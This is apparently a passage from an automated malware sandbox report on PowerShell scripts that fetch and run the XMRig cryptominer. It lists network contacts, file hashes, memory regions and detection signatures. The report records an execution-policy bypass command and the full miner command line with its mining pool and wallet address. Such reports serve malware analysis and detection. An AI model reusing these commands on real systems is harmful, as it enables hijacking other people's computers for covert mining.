US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
IE 52.111.236.23:443 tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 9.173.189.20.in-addr.arpa udp

Files

memory/1020-0-0x00007FFB9F983000-0x00007FFB9F985000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oev4qx3i.job.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1020-10-0x0000017ABDDB0000-0x0000017ABDDD2000-memory.dmp

memory/1020-11-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp

memory/1020-12-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp

memory/1020-14-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp

memory/1020-15-0x0000017ABE310000-0x0000017ABE322000-memory.dmp

memory/1020-16-0x0000017ABE2F0000-0x0000017ABE2FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4704-47-0x00000241CB900000-0x00000241CB920000-memory.dmp

memory/4704-48-0x00000241CD2F0000-0x00000241CD310000-memory.dmp

memory/4704-49-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/1020-50-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp

memory/4704-53-0x000002425FEE0000-0x000002425FF00000-memory.dmp

memory/4704-52-0x00000241CD310000-0x00000241CD330000-memory.dmp

memory/1020-51-0x00007FFB9F983000-0x00007FFB9F985000-memory.dmp

memory/4704-54-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/1020-55-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp

memory/4704-56-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/1020-57-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp

memory/4704-58-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-60-0x000002425FEE0000-0x000002425FF00000-memory.dmp

memory/4704-59-0x00000241CD310000-0x00000241CD330000-memory.dmp

memory/4704-61-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-62-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-63-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-64-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-65-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-66-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-67-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-68-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-69-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-70-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-71-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-72-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-73-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-74-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-75-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-76-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-77-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-78-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-79-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-80-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-81-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-82-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-83-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-84-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-85-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-86-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-87-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-88-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-89-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-90-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-91-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-92-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-93-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-94-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-95-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-96-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-97-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-98-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-99-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-100-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-101-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-102-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-103-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-104-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-105-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-106-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-107-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-108-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-109-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-110-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-111-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-112-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-113-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-114-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-115-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-116-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-117-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-118-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

memory/4704-119-0x00007FF747390000-0x00007FF747FC3000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:30

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1795s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 36.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 35.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 11.173.189.20.in-addr.arpa udp

Files

memory/1992-0-0x00007FFEE9C43000-0x00007FFEE9C45000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_phiyu05h.uuf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1992-10-0x0000016676C90000-0x0000016676CB2000-memory.dmp

memory/1992-11-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp

memory/1992-12-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp

memory/1992-14-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp

memory/1992-15-0x0000016679410000-0x0000016679422000-memory.dmp

memory/1992-16-0x0000016676CE0000-0x0000016676CEA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3748-47-0x0000029EAA700000-0x0000029EAA720000-memory.dmp

memory/3748-48-0x0000029EABF00000-0x0000029EABF20000-memory.dmp

memory/3748-49-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-53-0x0000029F3EAE0000-0x0000029F3EB00000-memory.dmp

memory/3748-52-0x0000029F3EB00000-0x0000029F3EB20000-memory.dmp

memory/1992-51-0x00007FFEE9C43000-0x00007FFEE9C45000-memory.dmp

memory/3748-50-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/1992-54-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp

memory/3748-55-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-56-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-58-0x0000029F3EAE0000-0x0000029F3EB00000-memory.dmp

memory/3748-57-0x0000029F3EB00000-0x0000029F3EB20000-memory.dmp

memory/3748-59-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-60-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-61-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-62-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-63-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-64-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-65-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-66-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-67-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-68-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-69-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-70-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-71-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-72-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-73-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-74-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-75-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-76-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-77-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-78-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-79-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-80-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-81-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-82-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-83-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-84-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-85-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-86-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-87-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-88-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-89-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-90-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-91-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-92-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-93-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-94-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-95-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-96-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-97-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-98-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-99-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-100-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-101-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-102-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-103-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-104-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-105-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-106-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-107-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-108-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-109-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-110-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-111-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-112-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-113-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-114-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-115-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-116-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

memory/3748-117-0x00007FF7E78F0000-0x00007FF7E8523000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:32

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1781s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 90.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 216.107.17.2.in-addr.arpa udp

Files

memory/3484-0-0x00007FFC27E43000-0x00007FFC27E44000-memory.dmp

memory/3484-5-0x0000027BFC1B0000-0x0000027BFC1D2000-memory.dmp

memory/3484-8-0x00007FFC27E40000-0x00007FFC2882C000-memory.dmp

memory/3484-9-0x0000027BFC260000-0x0000027BFC2D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dinji4vv.cei.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3484-18-0x00007FFC27E40000-0x00007FFC2882C000-memory.dmp

memory/3484-25-0x00007FFC27E40000-0x00007FFC2882C000-memory.dmp

memory/3484-48-0x0000027BFC300000-0x0000027BFC312000-memory.dmp

memory/3484-61-0x0000027BFC2E0000-0x0000027BFC2EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3088-90-0x00000214A7610000-0x00000214A7630000-memory.dmp

memory/3088-91-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3484-93-0x00007FFC27E43000-0x00007FFC27E44000-memory.dmp

memory/3088-92-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3484-94-0x00007FFC27E40000-0x00007FFC2882C000-memory.dmp

memory/3088-95-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-96-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-97-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-98-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-99-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-100-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-101-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-102-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-103-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-104-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-105-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-106-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-107-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-108-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-109-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-110-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-111-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-112-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-113-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-114-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-115-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-116-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-117-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-118-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-119-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-120-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-121-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-122-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-123-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-124-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-125-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-126-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-127-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-128-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-129-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-130-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-131-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-132-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-133-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-134-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-135-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

memory/3088-136-0x00007FF681FA0000-0x00007FF682BD3000-memory.dmp

